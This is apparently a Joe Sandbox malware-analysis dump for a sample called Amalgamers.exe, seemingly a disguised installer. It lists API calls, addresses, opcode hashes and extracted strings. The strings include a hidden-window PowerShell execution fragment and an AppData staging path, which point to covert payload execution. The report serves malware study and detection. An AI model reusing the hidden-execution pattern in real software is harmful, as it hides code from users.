                                        • Instruction Fuzzy Hash: B2B09235280A00AAEA215B00DE09F467A62A764701F408038B240250B1CAB200A6DB18
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2A,?), ref: 004031D2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                        • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                        • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                        • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,00403E3D), ref: 0040406B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
                                        • Instruction ID: d750239a91494785f156a03a2b8d5ac9aaa4eec5ddabb582aaccf4f48b9497e5
                                        • Opcode Fuzzy Hash: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
                                        • Instruction Fuzzy Hash: C9A012710000009BCB015B00EF04C057F61AB507007018434A2404003186310432FF1D
                                        APIs
                                        • Sleep.KERNELBASE(00000000), ref: 004014E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 7b9632354074489533dafd45b6bc4c0d3204f827ba2cfbbd71c55f5045c93cde
                                        • Instruction ID: 4f2bdf6dfe5cf4b60dd5b7335af101e6a5cbd4d7fd56710333224b44724b1ee5
                                        • Opcode Fuzzy Hash: 7b9632354074489533dafd45b6bc4c0d3204f827ba2cfbbd71c55f5045c93cde
                                        • Instruction Fuzzy Hash: BFD05B73B101419BD714E7F8B98485F73B4DB503153204837D441E2091D578C5424A28
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404A5C
                                        • GetDlgItem.USER32(?,00000408), ref: 00404A67
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AB1
                                        • LoadBitmapA.USER32(0000006E), ref: 00404AC4
                                        • SetWindowLongA.USER32(?,000000FC,0040503B), ref: 00404ADD
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AF1
                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B03
                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404B19
                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B25
                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B37
                                        • DeleteObject.GDI32(00000000), ref: 00404B3A
                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B65
                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B71
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C06
                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C31
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C45
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404C74
                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C82
                                        • ShowWindow.USER32(?,00000005), ref: 00404C93
                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D90
                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DF5
                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E0A
                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E2E
                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E4E
                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00404E63
                                        • GlobalFree.KERNEL32(00000000), ref: 00404E73
                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EEC
                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00404F95
                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FA4
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404FC4
                                        • ShowWindow.USER32(?,00000000), ref: 00405012
                                        • GetDlgItem.USER32(?,000003FE), ref: 0040501D
                                        • ShowWindow.USER32(00000000), ref: 00405024
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 1638840714-813528018
                                        • Opcode ID: 108f0c184bcf7ed6d9d4fb864c0bf3485061875d4b02c085815a1bca3aa8a10b
                                        • Instruction ID: 8b31743f23cd8b0b58ed2b5f291beccc42c2d4f26c41c681c3135c74bfbc6718
                                        • Opcode Fuzzy Hash: 108f0c184bcf7ed6d9d4fb864c0bf3485061875d4b02c085815a1bca3aa8a10b
                                        • Instruction Fuzzy Hash: 9D027FB0A00209AFEB20DF55DD85AAE7BB5FB84314F14413AF610B62E1C7799D52CF58
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 00404520
                                        • SetWindowTextA.USER32(00000000,?), ref: 0040454A
                                        • SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045FB
                                        • CoTaskMemFree.OLE32(00000000), ref: 00404606
                                        • lstrcmpiA.KERNEL32(Execute: ,Topfartens Setup: Installing), ref: 00404638
                                        • lstrcatA.KERNEL32(?,Execute: ), ref: 00404644
                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404656
                                          • Part of subcall function 004056A0: GetDlgItemTextA.USER32(?,?,00000400,0040468D), ref: 004056B3
                                          • Part of subcall function 0040620A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Amalgamers.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                                          • Part of subcall function 0040620A: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                                          • Part of subcall function 0040620A: CharNextA.USER32(?,"C:\Users\user\Desktop\Amalgamers.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                                          • Part of subcall function 0040620A: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                                        • GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,00000001,00429840,?,?,000003FB,?), ref: 00404714
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040472F
                                          • Part of subcall function 00404888: lstrlenA.KERNEL32(Topfartens Setup: Installing,Topfartens Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                                          • Part of subcall function 00404888: wsprintfA.USER32 ref: 0040492E
                                          • Part of subcall function 00404888: SetDlgItemTextA.USER32(?,Topfartens Setup: Installing), ref: 00404941
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A$C:\Users\user\AppData\Local\Reglements216$Execute: $Topfartens Setup: Installing$powershell.exe -windowstyle hidden
                                        • API String ID: 2624150263-1165901076
                                        • Opcode ID: 35ccfcd12aa65a6056ea3b79a366237fc8f8bc1b83ab477f5d53117e16670a8d
                                        • Instruction ID: e7408234a4186d1eb777f56003ea07db5a22e6c17a70b9954916109459a63af9
                                        • Opcode Fuzzy Hash: 35ccfcd12aa65a6056ea3b79a366237fc8f8bc1b83ab477f5d53117e16670a8d
                                        • Instruction Fuzzy Hash: EEA170B1900219ABDB11EFA6CD41AAF77B8EF85314F50843BF601B62D1DB7C89418B6D
                                        APIs
                                        • DeleteFileA.KERNEL32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405791
                                        • lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057D9
                                        • lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057FA
                                        • lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405800
                                        • FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405811
                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058BE
                                        • FindClose.KERNEL32(00000000), ref: 004058CF
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405775
                                        • "C:\Users\user\Desktop\Amalgamers.exe", xrefs: 00405768
                                        • \*.*, xrefs: 004057D3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\Amalgamers.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                        • API String ID: 2035342205-3891563557
                                        • Opcode ID: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
                                        • Instruction ID: 3130a24326b3cf8508e32ba03364d00ecd767046abd4d032e56f6a736b511150
                                        • Opcode Fuzzy Hash: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
                                        • Instruction Fuzzy Hash: AD519131900A05EAEF217B618C85BAF7A78DF42314F14817FF841B61E2D73C4952EE69
                                        APIs
                                        • CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402153
                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202
                                        Strings
                                        • C:\Users\user\AppData\Local\Reglements216\Fessewise, xrefs: 00402193
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID: C:\Users\user\AppData\Local\Reglements216\Fessewise
                                        • API String ID: 123533781-2812723231
                                        • Opcode ID: 00c6f69d0c611c55acbaeef9457f2e2871c7d6f88ec9903dd4d9a479ec053a50
                                        • Instruction ID: f4f88eda2e3132aa5920e2584167a74d80893369f9b2333c3bffcb98084fb778
                                        • Opcode Fuzzy Hash: 00c6f69d0c611c55acbaeef9457f2e2871c7d6f88ec9903dd4d9a479ec053a50
                                        • Instruction Fuzzy Hash: 44510771A00208BFCB10DFE4C989A9D7BB6AF48318F2085AAF515EB2D1DA799941CF54
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040270D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: 9a9d642bc180ce2e42395307b113c5168d8877eeb496379f1d9827102d39ec81
                                        • Instruction ID: 54a63a0b970f9f74e56537ecc54aa136cf23b82a2183361db5dda5742450debe
                                        • Opcode Fuzzy Hash: 9a9d642bc180ce2e42395307b113c5168d8877eeb496379f1d9827102d39ec81
                                        • Instruction Fuzzy Hash: 83F0EC72604151DBD700E7A49949DFEB76CDF11324FA0057BE181F20C1CABC8A459B3A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82a44bc8fd526afdff965e1cd5e7f2d0a246497ca5c27b0c944ad4ba04d420dd
                                        • Instruction ID: c7d8350576d698755b4cacea6fe682166efb8a165fc05e4c5726b7f1812f50b8
                                        • Opcode Fuzzy Hash: 82a44bc8fd526afdff965e1cd5e7f2d0a246497ca5c27b0c944ad4ba04d420dd
                                        • Instruction Fuzzy Hash: F4E17971900706DFDB24CF58C880BAAB7F5FB44305F15842EE897A7291E738AA95CF54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                                        • Instruction ID: bf128a229d130661f6540426524f772d2f37fab74758cf72108bd9da8b00e916
                                        • Opcode Fuzzy Hash: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                                        • Instruction Fuzzy Hash: 22C15931E042599BCF14CF68D4905EEB7B2FF89314F25826AD8567B380D738A942CF95
                                        APIs
                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404235
                                        • GetDlgItem.USER32(00000000,000003E8), ref: 00404249
                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404267
                                        • GetSysColor.USER32(?), ref: 00404278
                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404287
                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404296
                                        • lstrlenA.KERNEL32(?), ref: 00404299
                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042A8
                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042BD
                                        • GetDlgItem.USER32(?,0000040A), ref: 0040431F
                                        • SendMessageA.USER32(00000000), ref: 00404322
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040434D
                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040438D
                                        • LoadCursorA.USER32(00000000,00007F02), ref: 0040439C
                                        • SetCursor.USER32(00000000), ref: 004043A5
                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004043BB
                                        • SetCursor.USER32(00000000), ref: 004043BE
                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043EA
                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043FE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                        • String ID: Execute: $N$uA@
                                        • API String ID: 3103080414-2670778696
                                        • Opcode ID: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
                                        • Instruction ID: fd9e69a661c90447e44b9af037de2c0158a1a23ec1d513a6b2b78bd76040a697
                                        • Opcode Fuzzy Hash: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
                                        • Instruction Fuzzy Hash: A26183B1A00205BFDB109F61DD45F6A7B69EB84705F10803AFB057A1D1C7B8A951CF58
                                        APIs
                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
